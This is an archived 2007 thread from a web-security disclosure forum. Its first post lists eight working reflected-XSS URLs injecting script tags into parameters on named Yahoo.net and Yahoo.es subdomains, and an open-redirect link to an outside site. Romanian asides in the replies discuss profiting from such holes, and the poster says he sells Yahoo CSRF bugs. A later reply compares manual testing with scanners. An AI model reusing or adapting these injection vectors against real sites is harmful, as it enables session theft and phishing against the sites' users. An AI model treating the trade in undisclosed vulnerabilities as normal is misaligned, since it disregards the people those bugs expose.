Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Yahoo.net - Is this possible?
Posted by: nemessis
Date: November 29, 2007 03:29PM

1 hour on Yahoo.net subdomains searching xss's. I bet that if someone will search everyday 2-3 hours this list will be huge in just 2 weeks. This isn't good at all for Yahoo-inc image.


http://lib.store.yahoo.net/lib/danskinonline/fit-zoom.html?img="><script>alert(/Nemessis/)</script>%7Cname=Danskin

http://cruises.travel.yahoo.net/CS/ShipExplorer/PublicAreasImg.aspx?URL="><script>alert(/Nemessis/)</script>&Dsc=Kiosk

http://education.yahoo.net/degrees/searchresults.jsp?pc="><script>alert(/Nemessis/)</script>&sub=all&qual=all&ct=either

http://es.topformacion.yahoo.net/ficha_curso.php?curso_id=24511&master="><script>alert(/Nemessis/)</script>

http://es.topformacion.yahoo.net/buscador.php?libre=%22%3E%3Cscript%3Ealert%28%2FNemessis%2F%29%3C%2Fscript%3E&categoria_id=&tipo=

http://es.topformacion.yahoo.net/ficha_centro2.php?centro_id="><script>alert(/Nemessis/)</script>

http://de.motorrad.cars.yahoo.net/nuovo/Moto/marca.php3?modello="><script>alert(/Nemessis/)</script>&marca=Piaggio

http://shopping.yahoo.es/b2b/sitesearch/merchantRedirect.jsp?partner=yahoo&link=http%3A%2F%2Ftracker.tradedoubler.com%2Fclick%3Fp%3D58193%26a%3D393940%26url=http://rstzone.org

Options: ReplyQuote
Re: Yahoo.net - Is this possible?
Posted by: Fugitif
Date: December 06, 2007 03:33PM

2-3 hours? maybe if you search manual ..but if u use a good scanner you can find immediately :)

(de ce le pui publice cand poti lua bani pa ele ?)

Options: ReplyQuote
Re: Yahoo.net - Is this possible?
Posted by: nemessis
Date: December 06, 2007 11:30PM

I don't like scanners. It's very relaxing for me when I search xss's.

(Pentru ca am mai multe decat pot folosi toata viata in yahoo.com iar astea sunt prea terminate. Pun doar ce nu imi foloseste. Uita-te pe RST sa vezi ca yahoo este un subiect de baza la noi si xss-urile de la ei deja nu mai inseamna mare lucru pentru userii nostrii. Nu vand decat csrf-uri in yahoo dar deja devin din ce in ce mai greu de gasit)

Options: ReplyQuote
Re: Yahoo.net - Is this possible?
Posted by: rsnake
Date: December 10, 2007 05:40PM

@Fugitif - there is no way you would find all those in 2-3 hours, unless all you did was search those few pages. Scanners could take weeks or months pouring over all the pages on Yahoo and only find a handful of issues. It totally depends on what they are searching for, how they are spidering and what they spend time looking for.

As a for instance, I scanned a client's website for 12 hours with a commercial scanner a while back. In another window, for about 3 hours I searched for holes. In the time it took to find 10 holes (12 hours), I found 48, and ate food, and watched a movie - the benefits of working from home on the weekends.

Don't give scanners more credit than they are due. They are great at monotonous tasks, but they aren't a panacea.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.